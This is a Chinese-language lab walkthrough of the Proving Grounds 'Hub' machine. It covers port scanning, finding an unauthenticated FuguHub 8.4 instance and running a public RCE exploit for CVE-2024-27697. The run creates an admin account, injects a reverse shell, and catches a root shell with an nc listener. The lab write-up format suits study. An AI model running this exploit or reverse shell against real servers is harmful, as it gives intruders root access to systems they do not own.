临渊羡鱼

退而结网

0%

Proving Grounds Practice - Hub

Posted on In , ,
Proving Grounds Practice Lab中Hub打靶过程记录

Difficult

Easy

Scan

autorecon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
[*] ssh found on tcp/22.
    OpenSSH 8.4p1 


[*] http found on tcp/80.
    nginx/1.18.0

    http://192.168.212.25/readme.txt

    FuguHub BarracudaDrive




[*] http found on tcp/8082.
    barracudadrive.com
    FuguHub 8.4

    WebDAV enable



[*] http found on tcp/9999.
    https

80 nginx

端口扫描有readme.txt, 服务端cms: FuguHub 8.0

8082 FuguHub

可以直接进入,没有用户密码验证,在about页面看到fugu版本号 8.4

9999

和8082一样,区别是9999是https

foothold

searchsploit fuguhub, 8.1版本RCE

google搜索 fuguhub 8.4 exploit

https://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697

克隆代码后,直接执行, 成功获取shell, 用户是root

1
2
3
4
5
6
7
8
9
https://github.com/S─$ python exploit.py -r 192.168.212.25 -rp 8082 -l 192.168.45.234 -p 80
[*] Checking for admin user...
[+] No admin user exists yet, creating account with admin:admin123
[+] User created!
[+] Logging in...
[+] Success! Injecting the reverse shell...
[+] Successfully injected the reverse shell into the About page.
[+] Triggering the reverse shell, check your listener...
anjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697
1
2
3
4
5
rlwrap nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.25] 59038
id
uid=0(root) gid=0(root) groups=0(root)